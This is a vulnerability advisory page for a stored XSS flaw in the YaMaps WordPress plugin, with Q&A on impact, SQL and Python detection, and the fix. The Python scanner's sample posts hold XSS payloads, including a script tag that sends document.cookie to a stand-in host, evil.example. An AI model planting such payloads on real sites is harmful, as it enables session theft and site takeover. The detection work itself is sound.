CVE-2025-13958
Stored XSS in YaMaps WordPress Plugin via Unescaped Shortcodes
Publication date: 2025-12-29
Last updated on: 2025-12-29
Assigner: WPScan
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordpress | wordpress_plugin (YaMaps for WordPress) | before 0.6.40 (fixed in 0.6.40) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN | (not assigned) |
AI Powered Q&A
Can you explain this vulnerability to me?
The vulnerability in the YaMaps for WordPress plugin (versions before 0.6.40) is that the plugin does not validate or escape some of its shortcode attributes before printing them into the page or post output. Shortcode attributes matter here because a user with the Contributor role (or higher) normally cannot publish raw HTML: their post content is filtered, but the shortcode attribute value is stored as plain text and is only turned into HTML later, when the plugin renders the map on the front end. If the plugin concatenates that value into its markup without escaping, the filter is bypassed and whatever the contributor put in the attribute (a script tag, an event handler, a javascript: URL) becomes part of the page. The payload is stored with the post and runs in the browser of everyone who views it, which is a Stored Cross-Site Scripting (XSS) flaw.
How can this vulnerability impact me?
An attacker who holds a Contributor or higher account on the site can get arbitrary JavaScript executed in the context of your site's origin for every visitor who loads the affected page, including administrators who preview or review the contributor's post. Typical consequences are theft of session cookies, defacement, redirection to malicious sites, and actions performed with the privileges of whichever user is viewing the page, which on a WordPress site can mean changes made with an administrator's session. The practical risk is therefore a privilege escalation from a low-privilege content account to control of the site.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
First confirm whether the site is exposed: check the YaMaps plugin version in the WordPress admin plugin list (or with `wp plugin list` if WP-CLI is installed); anything before 0.6.40 is affected. Then look for exploitation attempts in stored content. Since the payload lives in shortcode attributes inside post content, the simplest check is a query against the posts table for the plugin's shortcode carrying a script tag:
SELECT ID, post_author, post_type, post_modified FROM wp_posts WHERE post_content LIKE '%[yamaps%script%]%';
Two caveats: replace the `wp_` prefix with your site's actual table prefix, and do not rely on the word `script` alone, because attribute-context XSS does not need a script tag (an `onmouseover=` or `onerror=` handler, or a `javascript:` URL, works just as well), so also search for those strings inside the shortcode. The query covers revisions and drafts too, since they are rows in the same table. Finally, review recent content from Contributor and Author accounts by hand, since those are the accounts that cannot post raw HTML and would have to go through this flaw. The resources for this CVE give no network-level detection commands. [1]
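The database query above only finds the word `script` inside the shortcode. The following script, added here as an example and not part of the advisory or of the YaMaps plugin, does the more complete check: it parses shortcodes and their attributes the way WordPress does (double-quoted, single-quoted and bare values), then flags attribute values that carry a script tag, an inline event handler, a javascript: URL, or characters that break out of an HTML attribute. The shortcode tag name `yamaps` is taken from the advisory's own query and the attribute names (`lat`, `lon`, `title`, `url`) are hypothetical; the sample posts are constructed for the demonstration and would in practice come from `SELECT ID, post_author, post_content FROM wp_posts`.

```python
"""Scan WordPress post content for shortcode attributes carrying XSS payloads.

Added example, not part of the advisory or of the YaMaps plugin. The tag name
'yamaps' is assumed from the advisory's SQL query; attribute names and the
sample posts below are constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# [tag attr=... attr=...]  -- WordPress shortcode tags cannot contain ']'
SHORTCODE_RE = re.compile(r"\[(?P<tag>[a-zA-Z0-9_-]+)(?P<attrs>[^\]]*)\]")

# Attribute grammar close to WordPress shortcode_parse_atts():
# name="value", name='value' or name=bare
ATTR_RE = re.compile(
    r"""(?P<name>[\w-]+)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<bare>[^\s"'\]]+))"""
)

# Indicators, checked in this order. The first three are high-signal; the
# fourth (quote or angle bracket inside the value) is noisy on its own but
# is exactly what lets a value escape an unescaped HTML attribute.
PAYLOAD_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("script-tag", re.compile(r"<\s*/?\s*script", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("breakout", re.compile(r"""["'<>]""")),
]
HIGH_SIGNAL = {"script-tag", "event-handler", "javascript-uri"}


def parse_shortcodes(content: str, tags) -> List[Tuple[str, Dict[str, str]]]:
    """Return (tag, {attr: value}) for every shortcode whose tag is in `tags`."""
    found = []
    for m in SHORTCODE_RE.finditer(content):
        tag = m.group("tag")
        if tags and tag not in tags:
            continue
        attrs: Dict[str, str] = {}
        for a in ATTR_RE.finditer(m.group("attrs")):
            value = next(v for v in (a.group("dq"), a.group("sq"), a.group("bare")) if v is not None)
            attrs[a.group("name").lower()] = value
        found.append((tag, attrs))
    return found


def classify_value(value: str) -> List[str]:
    """Names of the payload indicators that match an attribute value."""
    return [name for name, pattern in PAYLOAD_PATTERNS if pattern.search(value)]


def scan_posts(posts, tags=("yamaps",)) -> List[dict]:
    """One finding per suspicious attribute; 'high' marks a definite payload."""
    findings = []
    for post in posts:
        for tag, attrs in parse_shortcodes(post["post_content"], tags):
            for name, value in attrs.items():
                hits = classify_value(value)
                if hits:
                    findings.append({
                        "post_id": post["ID"],
                        "author": post.get("post_author"),
                        "tag": tag,
                        "attr": name,
                        "value": value,
                        "indicators": hits,
                        "high": bool(HIGH_SIGNAL & set(hits)),
                    })
    return findings


# Constructed sample rows standing in for wp_posts.
SAMPLE_POSTS = [
    {"ID": 11, "post_author": "editor",
     "post_content": 'Find us here: [yamaps lat="55.75" lon="37.61" title="Head office"]'},
    {"ID": 12, "post_author": "contributor",
     "post_content": "[yamaps lat='1' lon='2' title='x\" onmouseover=\"alert(1)']"},
    {"ID": 13, "post_author": "contributor",
     "post_content": '[yamaps lat="1" lon="2" title="<script>fetch(\'//evil.example/?c=\'+document.cookie)</script>"]'},
    {"ID": 14, "post_author": "contributor",
     "post_content": "[yamaps lat=3 lon=4 url=javascript:alert(document.domain)]"},
    {"ID": 15, "post_author": "author",
     "post_content": '[gallery ids="1,2"] and [yamaps lat="5" lon="6" title="Bob\'s cafe"]'},
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        level = "HIGH" if f["high"] else "review"
        print(f'{level:6} post {f["post_id"]} ({f["author"]}) [{f["tag"]} {f["attr"]}=...] {f["indicators"]}')
```

Run it against a dump of `ID, post_author, post_content` from the posts table (revisions included). Findings marked `high` are payloads; `breakout`-only findings such as an apostrophe in a map title are usually legitimate but are worth a glance, because those same characters are what an unescaped attribute needs in order to inject markup.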
What immediate steps should I take to mitigate this vulnerability?
Update the YaMaps plugin to version 0.6.40 or later; that release contains the fix and is the primary mitigation. Until the update is applied, treat shortcode use by Contributor, Author and similar lower-privileged accounts as untrusted: review their recent posts and drafts for the plugin's shortcode with suspicious attribute values, and consider limiting who can publish content that uses it. After updating, still review existing content, because a payload already stored in a post is only neutralised if the patched plugin escapes it on output; removing the injected attribute is the safe course. The underlying defect is a missing escaping step on shortcode attributes when they are written into HTML, which is the plugin author's fix to make, not something a site owner can bolt on; applying the update is the action to take. [1]